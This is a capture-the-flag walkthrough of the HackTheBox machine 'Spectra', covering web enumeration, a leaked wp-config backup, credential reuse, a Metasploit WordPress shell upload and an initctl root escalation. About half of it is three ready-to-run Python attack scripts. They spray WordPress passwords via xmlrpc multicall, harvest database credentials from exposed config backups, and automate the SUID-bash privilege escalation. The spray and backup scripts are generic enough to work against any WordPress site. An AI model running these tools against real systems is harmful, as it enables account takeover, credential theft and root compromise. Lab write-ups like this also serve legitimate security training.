Spectra

Spectra is an easy, beginner-friendly box at 10.10.10.229. We get a foothold through a WordPress site (database credentials leaked in a backup of wp-config.php are reused for the WordPress admin account, which lets us upload a shell) and escalate to root through initctl, which the user can run with sudo.

nmap Scan

Start with an nmap scan:

nmap -sC -sV -T4 -A -oA nmap_scan 10.10.10.229

The scan shows four open ports:

  • 22 – OpenSSH v8.1
  • 80 – http (nginx 1.17.4)
  • 3306 – mysql
  • 8081 – blackice-icecap

First, check the website on port 80.

Hovering over the links shows that they point to spectra.htb, so add an entry mapping spectra.htb to 10.10.10.229 in /etc/hosts.

Now open both links to see what they serve.

Meanwhile, run nikto against the web server to look for known issues.

Also run gobuster with the SecLists common.txt wordlist to brute-force directories; it found two.

Both directories are already linked from the main page.

Software Issue Tracker

It redirects to a WordPress site.

nmap labelled port 8081 as blackice-icecap, but that is only its guess based on the port number; browsing to it showed a simple hello-world page.

It looks like a rabbit hole, so we leave it and move on to the Software Issue Tracker.

Before exploring it, run wpscan against it.

wpscan

wpscan reports that xmlrpc.php is enabled. That matters because XML-RPC's authenticated methods (wp.getUsersBlogs, for example) take a username and password on every call, and system.multicall lets a single request carry many such calls, so credentials can be brute-forced much faster than through the login form. We can use wpscan for that as well.

First, enumerate usernames with wpscan.

It found administrator, which we confirmed through the login page (WordPress gives different errors for an unknown username and for a wrong password).

We then tried brute-forcing the password with Burp Intruder, but it was too slow.
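To show why the enabled xmlrpc.php is the faster route, here is an added example (not from the original writeup, and not how Burp Intruder works) that packs many wp.getUsersBlogs login attempts into one system.multicall request and maps the per-call results back to the candidate passwords. The endpoint URL, the batch size and the constructed server reply are assumptions; WordPress answers a failed login with a 403 fault inside the multicall array rather than a top-level fault.

```python
"""Password spraying through WordPress xmlrpc.php with system.multicall."""
import urllib.request
import xmlrpc.client

# Assumed endpoint (not in the original writeup); adjust to the real WordPress path.
XMLRPC_URL = "http://spectra.htb/xmlrpc.php"
# Authenticated method: returns the user's blogs, or a fault for bad credentials.
WP_METHOD = "wp.getUsersBlogs"


def build_multicall(username, passwords):
    """Pack one wp.getUsersBlogs call per candidate password into a single
    system.multicall body, so N guesses cost one HTTP round trip."""
    calls = [{"methodName": WP_METHOD, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(passwords, response_body):
    """Return the passwords whose call did not come back as a fault struct.

    A top-level <fault> (e.g. XML-RPC disabled) makes loads() raise
    xmlrpc.client.Fault, which the caller should treat as 'stop spraying'.
    """
    (results,), _ = xmlrpc.client.loads(response_body)
    if len(results) != len(passwords):
        raise ValueError("multicall returned %d results for %d calls" % (len(results), len(passwords)))
    hits = []
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # e.g. faultCode 403 "Incorrect username or password."
        hits.append(pw)  # anything else is the successful [blogs] array
    return hits


def spray(username, passwords, url=XMLRPC_URL, batch=50):
    """Send the candidates in batches; return the first accepted password or None."""
    for i in range(0, len(passwords), batch):
        chunk = passwords[i:i + batch]
        req = urllib.request.Request(
            url,
            data=build_multicall(username, chunk).encode(),
            headers={"Content-Type": "text/xml"},
        )
        with urllib.request.urlopen(req, timeout=10) as resp:
            hits = parse_multicall(chunk, resp.read())
        if hits:
            return hits[0]
    return None


def constructed_response(passwords, correct):
    """Build the reply WordPress would send, for offline use.
    Constructed here for the example, not captured from the box."""
    results = []
    for pw in passwords:
        if pw == correct:
            # Success: the multicall wraps wp.getUsersBlogs' array in another array.
            results.append([[{"isAdmin": True, "blogid": "1", "blogName": "Software Issue Tracker"}]])
        else:
            results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


if __name__ == "__main__":
    candidates = ["password", "devteam01", "admin"]
    body = constructed_response(candidates, "devteam01")
    print("offline demo, accepted:", parse_multicall(candidates, body))
```

Keep the batch small enough that the server does not hit its request size or execution time limits; some hardened sites also disable system.multicall while leaving xmlrpc.php reachable, in which case every batch returns a top-level fault and the spray should stop.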

Meanwhile, check the other link from the main page, http://spectra.htb/testing/index.php.

This gives a database connection error. From the nikto scan, however, we know directory listing is enabled on /testing.

The listing includes wp-config.php, but requesting it returns the same connection error: the server executes the PHP instead of showing it.

Below it is wp-config.php.save. Opening it in a browser shows a blank page, because the server returns the PHP source verbatim and the browser hides everything inside the <?php ... ?> tags. Fetching it with curl (or viewing the page source) shows the full configuration:

Database

This gives database credentials. Trying them against MySQL on port 3306 in several ways only returned "Host ... is not allowed to connect to this MySQL server", meaning the account may only connect from particular hosts (typically localhost).

Try the same credentials at wp-login, since developers often reuse passwords.
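The backup file is worth generalising: editors and admins leave wp-config.php.save, .bak, .orig, .old or ~ copies behind, and the web server hands those out as plain text because their extension is not .php. The following added example (not from the writeup) probes a small list of assumed backup suffixes and pulls the DB_* defines out of whatever comes back; the sample configuration is constructed for the offline run, reusing the devtest:devteam01 pair the page found, and the list of suffixes is an assumption.

```python
"""Find a leaked wp-config backup and extract the database credentials."""
import re
import urllib.error
import urllib.request

# Matches define( 'DB_USER', 'devtest' ); with either quote style and optional spaces.
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_[A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

# Assumed list of common editor/admin backup suffixes; not taken from the writeup.
BACKUP_SUFFIXES = [".save", ".bak", ".orig", ".old", "~", ".swp"]


def extract_db_defines(text):
    """Return {name: value} for every quoted DB_* define in wp-config source."""
    return dict(DEFINE_RE.findall(text))


def backup_candidates(base_url):
    """URLs to try for a given wp-config.php URL."""
    return [base_url + suffix for suffix in BACKUP_SUFFIXES]


def fetch_leaked_config(base_url):
    """Probe each candidate; return (url, creds) for the first one that parses.

    The body is decoded leniently so a stray vim .swp file does not abort the run.
    """
    for url in backup_candidates(base_url):
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                body = resp.read().decode(errors="replace")
        except (urllib.error.URLError, OSError):
            continue  # 404, connection refused, timeout: try the next suffix
        creds = extract_db_defines(body)
        if creds:
            return url, creds
    return None, {}


# Constructed sample of what the .save file looked like; DB_NAME/DB_HOST/DB_CHARSET
# values are placeholders, the user and password are the ones the writeup found.
SAMPLE_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'devtest' );
define( 'DB_PASSWORD', 'devteam01' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'WP_DEBUG', false );
$table_prefix = 'wp_';
"""


if __name__ == "__main__":
    print("offline sample:", extract_db_defines(SAMPLE_CONFIG))
    url, creds = fetch_leaked_config("http://spectra.htb/testing/wp-config.php")
    print("live probe:", url, creds)
```

The regex deliberately matches only quoted DB_* defines, so unrelated settings such as WP_DEBUG are ignored; DB_HOST is kept because it tells you whether the MySQL account will even accept a remote connection before you try it.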

Access to wp-admin

devtest:devteam01 gives "unknown username", but enumeration already gave us administrator, and administrator:devteam01 logs in.

We now have admin access to the WordPress dashboard.

First, check the other users under Users in the navigation panel.

There is only the administrator user, with the following details:

  • Username: administrator
  • email: devteam@megabank.local
  • website: http://10.10.10.90/sites/dev (a rabbit hole: 10.10.10.90 is out of scope and unreachable from the box)

Exploitation through Metasploit

With admin credentials in hand, search Metasploit for a suitable module.

Searching for "wordpress admin" gives the following results.

Entry 2 is the WordPress admin shell upload module (exploit/unix/webapp/wp_admin_shell_upload), which logs in with the admin credentials, uploads a malicious plugin and runs the payload. We use it to gain access as shown below.

The options set (target host and URI, the WordPress credentials, and the listener address) were:

Running the exploit opens a Meterpreter session (it worked 😉).

Shell

Drop from Meterpreter to the target's own shell with the shell command, then upgrade to a proper bash TTY:

python3 -c "import pty;pty.spawn('/bin/bash')"

In the web root the Python command failed with an error; running the same command from /tmp worked.

clear then complained that TERM was not set, so export it:

export TERM=xterm

Now read /etc/passwd for the existing users.

These users have a login shell:

  • root:x:0:0:root:/root:/bin/bash
  • chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
  • nginx:x:20155:20156::/home/nginx:/bin/bash
  • katie:x:20156:20157::/home/katie:/bin/bash

We are currently nginx. katie looks like the interesting account.

user.txt is in katie's home, but only katie can read it.

Local Enumeration

Run linpeas.sh. Executing the file directly gives a permission error, so run it through the interpreter with bash linpeas.sh, which does not need the execute bit.

The shell has no scroll-back, so tee the (colourised) output to a file, start a Python HTTP server on the target and wget the file to the local machine to read it properly:

bash linpeas.sh | tee -a result

In the linpeas output there is a path to the main site's wp-config.php.

That file holds the MySQL credentials dev:development01.

Logging in with them, we can dump the wp_users table:

Next, check /opt.

Here an interesting file exists named autologin.conf.orig

Its contents are:

It is an autologin script that reads a password from a file and feeds it to the login shell at boot.

The password file is /etc/autologin.

It contains the password SummerHereWeCome!!, but not whose it is. Try it against the other two non-root users, chronos and katie, one by one. su does not work on this box, though.

SSH (User)

Try SSH instead.

The password works for katie over SSH.

Privilege Escalation

We have the user flag; time for privilege escalation. Before running linpeas, check katie's sudo rights with sudo -l:

katie can run initctl as root.

List the known jobs with initctl list.

There are many more than shown here, but one job, test, is stopped and looks suspicious. Its configuration is /etc/init/test.conf:

Edit the job's script stanza so that it sets the SUID bit on /bin/bash. The stanza runs as root when the job starts, so afterwards bash runs with root privileges for whoever executes it.

Now start the job with sudo initctl start test.

Then launch bash with the -p flag (-p keeps the effective UID; without it bash drops the SUID privilege and runs as katie again).

id now shows that the effective user id (euid) and effective group id (egid) are root.

With an effective uid of root we can read root.txt.
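The steps above as one script, added here as an example and not taken from the writeup: it writes a minimal Upstart job whose script stanza sets the SUID bit on /bin/bash, starts it through the sudo-able initctl, verifies the bit actually landed before trusting it, and then execs bash -p. The initctl path, the job name and the assumption that katie can write /etc/init/test.conf (the writeup edits that file in place) are taken from this box; change them for any other target. The check helpers are split out so the SUID test can be exercised without root.

```python
"""Escalate via sudo initctl: an Upstart job runs its script stanza as root."""
import os
import stat
import subprocess

JOB_NAME = "test"                      # the stopped job seen in `initctl list`
JOB_PATH = "/etc/init/%s.conf" % JOB_NAME  # writable by katie on this box (assumption)
INITCTL = "/sbin/initctl"              # assumed path; take it from the `sudo -l` output
TARGET = "/bin/bash"


def job_conf(target=TARGET):
    """Minimal Upstart job. `task` makes `initctl start` wait for the script to
    finish, so the SUID bit is already set when start returns."""
    return (
        'description "test job"\n'
        "task\n"
        "script\n"
        "    chmod u+s %s\n" % target +
        "end script\n"
    )


def is_suid_mode(mode):
    """True when an st_mode value carries the set-user-ID bit."""
    return bool(mode & stat.S_ISUID)


def is_suid(path):
    return is_suid_mode(os.stat(path).st_mode)


def escalate():
    # 1. overwrite the job definition (only possible because the conf is writable)
    with open(JOB_PATH, "w") as fh:
        fh.write(job_conf())
    # 2. start it as root through the sudo rule for initctl
    subprocess.run(["sudo", INITCTL, "start", JOB_NAME], check=True)
    # 3. confirm the bit before relying on it; a stale job state or a typo in
    #    the stanza leaves bash unchanged and -p would then do nothing
    if not is_suid(TARGET):
        raise SystemExit("SUID bit not set on %s; check `sudo %s status %s`" % (TARGET, INITCTL, JOB_NAME))
    # 4. -p stops bash from resetting euid to the real uid on startup
    os.execv(TARGET, ["bash", "-p"])


if __name__ == "__main__":
    escalate()
```

If the job is already running, initctl start fails with "Job is already running"; stop it first (sudo initctl stop test) so the edited stanza is executed. Clean up afterwards with chmod u-s /bin/bash and restore the original test.conf.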
